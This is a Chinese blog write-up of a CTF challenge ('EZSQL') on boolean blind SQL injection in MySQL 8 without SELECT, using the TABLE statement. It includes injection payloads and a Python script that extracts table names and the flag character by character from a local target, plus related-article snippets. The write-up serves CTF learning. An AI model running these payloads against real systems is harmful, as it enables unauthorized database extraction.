省赛 EZSQL

最新推荐文章于 2024-05-29 11:50:09 发布
最新推荐文章于 2024-05-29 11:50:09 发布
阅读量275 收藏 1
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/116999898
版权

考察知识点

MYSQL8

无SELECT

盲注

无select注入特性

第一步

是bool盲注,但是没有select,
无select注入,使用的是table语句。

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。

首先需要知道表名使用MySQL一些自带的特殊表来盲注表

information_schema.TABLESPACES_EXTENSIONS

在这里插入图片描述

使用这个语句来一个一个字段的注入出表名,使用这个语句进行注入只能单列查询不能如同联合查询一般使用group_concat来连接要查询的字段。所以只能用 limit 来限制输出的内容。

在这里插入图片描述
3、使用盲注将所需的表名注入出来

在这里插入图片描述
这里两个空位代表着表的两个字段,一张表中有多少个字段就要有多少个空位。

在注入时还有几个规律要注意:

首先需要从第一个字段开始猜解数据,如果不按顺序来得到的数据永真。
在这里插入图片描述

在这里插入图片描述

其实第二个字段应该为空,所以需要从第一个字段开始猜解。这是坑点之一,也算是一个难点。

第二个难点是猜解字符串时true 和false的出现时机,在最后一位字符之前都是相同的。

在前面的字符猜解时,直到正确的字符出现时,ascii码小于或等于这个字符的查询结果永真。
在这里插入图片描述
在这里插入图片描述
这个字段的值为mysql因此到m之前的所有字符都为真。
在这里插入图片描述

直到n这个字符,也就是大于m的才会为假。只能使用字符串拼接的方式逐字查询也就是 m my mys 这样的方式逐步拼接字符串

在这里插入图片描述
在这里插入图片描述
最后一个要点,当第一个字符是正确时后面拼接的字符才能正确判断

先爆破表数量再注入猜解表名

1'and('{}','')<=(TABLE/**/information_schema.TABLESPACES_EXTENSIONS/**/LIMIT 0,1)--+

在这里插入图片描述

得到表名后再猜字段数 ,一个个加空格直到结果为真

这个用来判断有几个字段

payload="1'and("","","")<=(TABLE/*\**\*/fakeflag/\*\*/limit/**/0,1)--+"

第一个是对的回显
在这里插入图片描述
下面是错的回显
在这里插入图片描述

payload="1'and(4,"fl4gg","{}")<=(TABLE/**/fakeflag/**/limit/**/3,1)--+"

import requests
from urllib import parse
ascii="/0123456789:;ABCDEFGHIJKLMNOPQRSTUYWXYZ_.abcdefghijklmnopqrstuvwxyz{|}~"
def exp(url):
    result=""
    tablename=""
    j=0
    while j<=100:
        j+=1
        tablename=result
        for i in ascii:

            payload="1'and(4,\"fl4gg\",\"{}\")<=(TABLE/**/fakeflag/**/limit/**/3,1)--+".format(tablename+i)
            #payload="1'and('{}','')<=(TABLE/**/information_schema.TABLESPACES_EXTENSIONS/**/LIMIT 7,1)--+".format(tablename+i)
            re=requests.get(url+payload)
            #print(url+payload)
            if "Enjoy This Game" not in re.text:
                result+=chr(ord(i)-1)
                print(result)
                break
    result=result[:-1]+chr(ord(result[-1])+1)
    print(result)

url="http://127.0.0.1/?id="
exp(url)

在这里插入图片描述
最后再转换成小写

Je3Z
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ezsql mysql_PHP_ezSQL PHP数据库操作类库,ezSQL 下载地址: 下载 : ezSQL 新 - phpStudy
weixin_34827430的博客
02-01 626
ezSQL PHP数据库操作类库ezSQL 下载地址:下载 : ezSQL新版本是2.05添加了很多支持,包括 CodeIgniter,MSSQL, PDO 等等我之前也为 CodeIgniter 写过一次,不过只支持 MySQL看看使用示例其实也没什么难度,直接看源代码即可,主要是程序设计的思想很好。Example 1---------------------------------------...
ezsqli
qq_40710190的博客
09-28 425
ezsqli 根据题目的提示这是一道关于SQL注入的题,这几天恶补了一波SQL注入,记录一下解题过程 1.前景知识 MySQL数据库注入基础 报错基于GET的注入GET-Error based PHP绕过and和or过滤 先看下来吧,如果有不会的在回头来前景知识这里找好了 2.正题进入 二话不说,F12查看源码 <script type="text/javascript"> name = $_POST['name']; $password = $_POST['pw'];
Ezsql
weixin_46601305的博客
01-15 605
BUUCTF Ezsql
select注入
最新发布
qq_74925081的博客
05-29 371
创建了一个user表,表里存在一个类型为bool的参数;观察代码发现提交参数username为'号闭合,所以需要一个'闭合username前的';观察代码发现$q是由传入参数拼接而成的,考虑通过注入生成一个bool类型为1的账号;if ($is_admin),为真即输出包含文件flag.php;
ezSQL - 快速、灵活的 SQL 编辑器
gitblog_00087的博客
03-18 424
ezSQL - 快速、灵活的 SQL 编辑器 ezSQL 是一个轻量级但功能强大的 SQL 编辑器,旨在帮助开发人员更轻松地编写和管理他们的 SQL 查询。无论您是数据库管理员还是开发者,都可以利用 ezSQL 的各种特性提高您的工作效率。 主要特点 跨平台支持 - 支持 Windows, macOS 和 Linux 操作系统。 简洁易用的界面 - 易于理解的布局和直观的操作方式让您可以快速上手...
[GYCTF2020]Ezsqli
shinygod的博客
04-11 559
知识点:无列名注入 id=1^(length(database())>1)^1 说明这里可以用布尔盲注。 接下来就是三爆了,但是这边把information过滤了,可以用sys.x$schema_flattened_keys绕过。 import requests url = "http://2270547b-9645-4b8f-ace8-e09ed89ae3d2.node4.buuoj.cn:81/index.php" name = "" dic = "qwertyuioplkjhgfdsa
ezSQL PHP数据库操作类库
10-29
WordPress 使用的数据库操作类就是它 -- ezSQL我用了好多年了,我特别喜欢它的几个类方法,可以有效提高代码简洁度。
php ezsql的文档翻译
06-20
在这个例子中,我们首先包含了 ezsql 的核心文件和 MySQL 驱动文件,然后创建了一个 ezSQL_mysql 对象来建立数据库连接。`get_results` 函数执行 SQL 查询并返回结果,最后通过 `foreach` 循环遍历并打印查询结果。 ...
ezsql数据库类PDF 教程
05-08
ezSQL:ezSQL类的用法和详细信息
05-12
EZSQL数据库类 EzSQL是用PHP编程语言编写的类,它构成了高级应用程序(如Wordpress)的基础结构。 此类的基本功能是连接到数据库并管理表中的数据。 用于Mssql,Mysql,Oracle,Sybase,PostgresqlSqlite数据库。 ...
ezsql-5.1.1.zip(php sql lib)
10-28
这表明ezSQL具有良好的兼容性和灵活性,可以在各种不同的数据库系统上运行,满足不同项目的需求。 在标签中,“php”和“sql”揭示了这个库是PHP编程语言与SQL数据库操作相关的工具。这意味着开发者可以利用ezSQL在...
ezsql:PHP类,使与数据库的交互变得非常容易
01-30
ezsql 一个使处理数据库连接非常容易的类。 这是 ,具有许多现代编程实践,将破坏版本3的用户。 以一种主要方式破坏了版本2.1.7,它需要PHP 5.6 。 哪一个删除了mysql扩展支持,除此之外,到目前为止,使用该库没有任何变化,只有附加功能。 该库有一个Database类,它是模式与容器托管的组合。 该库现在遵循许多OOP原则,其中一项原则已删除公共访问的方法属性。 该库还遵循PSR-2,PSR-4,PSR-11约定,并且主要遵循PSR-1,这仍在进行中。 更多待办事项... 有关完整概述,请参见 ,它还没有完全完成。 安装 composer require ezsql/ezsql 用法 require 'vendor/autoload.php' ; // **** is one of mysqli, pgsql, sqlsrv, sqlite3, or Pdo. use ezsql\ Database ; $ db = Database :: initialize ( '****' , [ $ dsn_path_user , $ password , $ dat
PHP ezsql_2.13
10-13
PHP的ezsql数据库类文件,适用于大多数数据库操作
ezsql mysql_认识ezSQL,一个简单方便的php数据库类
weixin_35676977的博客
01-19 232
用 WordPress 几年的时间了,却并不了解 WordPress,作为一只井底之蛙,我不是一个专业的人,毕竟我了解的还不够全面,做网站这么久了,我居然不知道还有ezSQL这么一个好的开源 PHP 数据库类。知道 ezSQL 也有一些日子了,记得还是因为当时做我们泪雪用户中心的时候了解到的,因为当时项目已经接近尾声,所以也就没有用上 ezSQL,实属遗憾,所以最近想做一个小拓展的时候,子凡第一时...
EZSQL 中文手册
lyzhang1999的专栏
02-12 3829
ezSQL Overview download ez_sql.zip  To email the creator: justin_at_jvmultimedia_dot_com ezsql 概况 · ezSQL is a widget that makes it very fast and easy for you to use database(s) within your PHP scr
[青少年CTF]ezsql
明裕学长的博客
03-16 312
猜测出密码后登录得到flag。
ez_SQL 单例
perfel的专栏
12-27 784
<?php //ez_Sql数据库类, //可能还需要更改ez_sql_mysql.php中的port端口值 //ez_SQL的引用路径,修改 include_once 'shared/ez_sql_core.php'; include_once 'mysql/ez_sql_mysql.php'; class myDb{ private static $db; private
ezsqli(GYCTF-WEB)
火柴人的博客
03-13 873
1.知识点 SQL盲注: 布尔盲注 无列名盲注 2.分析 题目过滤了or和union,无法使用Information_Schema.Tables。 之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。 但是我们首先需要查找flag所在的表名,这里我们参考 Alternatives to Extract Tables and Columns ...
ezsql mysql_【知识必备】ezSQL,最好用的数据库操作类,让php操作sql更简单~
weixin_36246576的博客
01-19 319
最近用php做了点小东东,用上了ezSQL,感觉真的很ez,所以拿来跟大家分享一下~ezSQL是一个非常好用的PHP数据库操作类。著名的开源博客WordPress的数据库操作就使用了ezSQL的MySQL部分。该数据库操作类支持几乎所有主流的数据库,如:PHP-PDO, mySQL, Oracle, InterBase/FireBird, PostgreSQL, SQLite以及MS-SQL等。e...
buuctf Ezsql
09-02
对于您提到的 buuctf Ezsql,我可以提供一些基本的信息。buuctf 是一个CTF(Capture The Flag)竞赛,在这个比赛中,参与者需要解决各种安全相关的问题。而 Ezsql 是一个SQL注入漏洞利用工具,用于检测和利用存在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值